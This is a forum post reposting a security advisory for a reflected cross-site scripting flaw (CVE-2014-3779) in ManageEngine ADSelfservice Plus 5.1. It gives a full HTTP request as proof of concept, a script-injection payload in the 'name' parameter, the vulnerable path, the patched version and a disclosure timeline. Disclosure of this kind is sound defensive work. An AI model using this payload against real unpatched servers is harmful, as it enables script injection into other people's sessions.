Jump to content
Aerosol

ADSelfservice Plus 5.1 Cross Site Scripting

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Security Advisory : 
Exploit Title: 
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 03-01-2015
Vendor Homepage : 
Software Link : N/A

Version :

ADSelfservice Plus version 5.1 Build :5102 , Evaluation version –Trial

Tested on :

Windows XP SP2 -Host machine ,Windows server 2003 as Active directory

CVE-2014-3779

Type of Application :  Web application

Release mode : Coordinated disclosure

Vulnerability Description : 
It is observed that the Manageengine ADSelfservice Plus  is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the “name” parameter and
the unfiltered input is reflected to the user 


Proof of concept :

Request :

POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1
Host: 192.168.163.134:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on


Parameter affected:

name

Payload (Exploit Code):

"";</script><script>alert(0)</script><"

Vulnerable link: 

192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription 



Tools used :

Mozilla firefox browser v28.0 , Burp proxy free edition v1.5


## Workaround ##
----------------
Update to newer Version 5.2 Build 5202 
http://www.manageengine.com/products/self-service-password/download.html?btmMenu 

## TimeLine ##
----------------------
13th Apr 2014 : Bug Discovered
15th Apr 2014 : vendor was notified by e-mail
16th Apr 2014 : Vendor response received
13th  May 2014 : Vendor acknowledged and released a patch
22nd  May 2014 : Mitre Team provided CVE id
03rd Jan 2015 : Public Disclosure

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...